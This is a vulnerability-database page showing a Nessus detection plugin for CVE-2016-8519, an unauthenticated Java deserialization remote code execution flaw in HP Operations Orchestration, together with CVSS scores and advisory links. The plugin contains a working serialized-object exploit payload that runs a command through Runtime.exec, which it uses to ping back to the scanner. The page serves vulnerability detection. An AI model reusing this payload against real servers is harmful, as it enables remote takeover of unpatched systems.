Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.HP_OPERATIONS_ORCHESTRATION_BRIDGE_EXEC.NASL
HistoryJan 16, 2017 - 12:00 a.m.

HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE

2017-01-1600:00:00
This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
130

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.534

Percentile

97.6%

JSON

The version of HP Operations Orchestration running on the remote host is affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(96532);
  script_version("1.9");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2016-8519");
  script_bugtraq_id(95225);
  script_xref(name:"HP", value:"HPSBGN03688");
  script_xref(name:"HP", value:"emr_na-c05361944");
  script_xref(name:"ZDI", value:"ZDI-17-001");

  script_name(english:"HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE");
  script_summary(english:"Tries to execute a command via deserialization.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of HP Operations Orchestration running on the remote host
is affected by a remote code execution vulnerability in the
wsExecutionBridgeService servlet due to improper validation of
user-supplied input before deserialization. An unauthenticated, remote
attacker can exploit this, by sending a crafted serialized Java
object, to execute arbitrary code.");
  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05361944
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6db3b8a9");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-001/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to HP Operations Orchestration version 10.70 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-8519");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/01/03");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/16");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:operations_orchestration");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("hp_operations_orchestration_detect.nbin");
  script_require_keys("installed_sw/HP Operations Orchestration");
  script_require_ports("Services/www", 8080, 8443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

appname = "HP Operations Orchestration";
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:8080);
install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);

soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port, appname);

# serialized beansutils to execute ping -n 10 xxx
beansutils = '\xac\xed\x00\x05\x73\x72\x00\x49\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x4d\x65\x74\x68\x6f\x64\x49\x6e\x76\x6f\x6b\x65\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\xb2\x4a\xb4\x07\x8b\x41\x1a\xd7\x02\x00\x03\x49\x00\x05\x69\x6e\x64\x65\x78\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x08\x70\x72\x6f\x76\x69\x64\x65\x72\x74\x00\x3f\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x63\x6f\x72\x65\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x3b\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x7d\x00\x00\x00\x01\x00\x3d\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x07\x67\x65\x74\x54\x79\x70\x65\x73\x7d\x00\x00\x00\x02\x00\x16\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x54\x79\x70\x65\x00\x1d\x6a\x61\x76\x61\x78\x2e\x78\x6d\x6c\x2e\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x78\x71\x00\x7e\x00\x06\x73\x72\x00\x60\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x73\x75\x70\x70\x6f\x72\x74\x2e\x41\x75\x74\x6f\x77\x69\x72\x65\x55\x74\x69\x6c\x73\x24\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x44\x65\x6c\x65\x67\x61\x74\x69\x6e\x67\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x85\x62\xcb\xc0\x0c\xfd\x31\x13\x02\x00\x01\x4c\x00\x0d\x6f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x31\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x62\x65\x61\x6e\x73\x2f\x66\x61\x63\x74\x6f\x72\x79\x2f\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x2f\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x78\x71\x00\x7e\x00\x06\x73\x71\x00\x7e\x00\x09\x73\x71\x00\x7e\x00\x0d\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x01\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70';
body = '\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x3c\x0a\x00\x03\x00\x22\x07\x00\x3a\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x07\x00\x30\x01\x00\x03\x63\x6d\x64\x08\x00\x32\x01';
trailer = '\x75\x71\x00\x7e\x00\x21\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x1b\x0a\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3b\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78\x71\x00\x7e\x00\x26';
cmd_ping = '/c ping -n 10 ' + compat::this_host();
cmd_ping = mkword(len(cmd_ping)) + cmd_ping;
cmd_ping += '\x08\x00\x34\x01\x00\x04\x65\x78\x65\x63\x01\x00\x28\x28\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x36\x00\x37\x0a\x00\x2b\x00\x38\x01\x00\x1c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x01\x00\x1e\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x3b\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2e\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x3b\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0e\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x27\x00\x06\x00\x02\x00\x00\x00\x1b\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x05\xbd\x00\x31\x59\x03\x12\x33\x53\x59\x04\x12\x35\x53\xb6\x00\x39\x57\xb1\x00\x00\x00\x00\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x23\x00\x10\x00\x09';
body += cmd_ping;
beansutils += mkdword(len(body)) + body;
beansutils += trailer;

http_request = 'POST /oo/backwards-compatibility/wsExecutionBridgeService HTTP/1.0\r\n' +
               'Host: ' + get_host_ip() + ':' + port + '\r\n' +
               'Content-Type: application/x-java-serialized-object; charset=utf-8\r\n' +
               'Content-Length: ' + len(beansutils) + '\r\n' +
               '\r\n' +
               beansutils;

filter = "icmp and icmp[0] = 8 and src host " + get_host_ip();
response = send_capture(socket:soc, data:http_request, pcap_filter:filter);
icmp = tolower(hexstr(get_icmp_element(icmp:response, element:"data")));
close(soc);

# No response, meaning we didn't get in
if(isnull(icmp)) audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]);

report =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);

Related

prion 1
checkpoint_advisories 1
nvd 1
zdi 1
nessus 1
cvelist 1
cve 1
prion
prion
Remote code execution
2018-02-15 22:29:00
checkpoint_advisories
checkpoint_advisories
HPE Operations Orchestration Insecure Deserialization (CVE-2016-8519)
2017-02-23 00:00:00
nvd
nvd
CVE-2016-8519
2018-02-15 22:29:00
zdi
zdi
Hewlett Packard Enterprise Operations Orchestration Backwards Compatibility Deserialization of Untrusted Data Remote Code Execution Vulnerability
2017-01-10 00:00:00
nessus
nessus
HP Operations Orchestration 10.x < 10.70 wsExecutionBridgeService Servlet Java Object Deserialization RCE
2017-01-12 00:00:00
cvelist
cvelist
CVE-2016-8519
2018-02-15 22:00:00
cve
cve
CVE-2016-8519
2018-02-15 22:29:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.534

Percentile

97.6%

JSON
Related for HP_OPERATIONS_ORCHESTRATION_BRIDGE_EXEC.NASL
prion1checkpoint_advisories1nvd1zdi1nessus1cvelist1cve1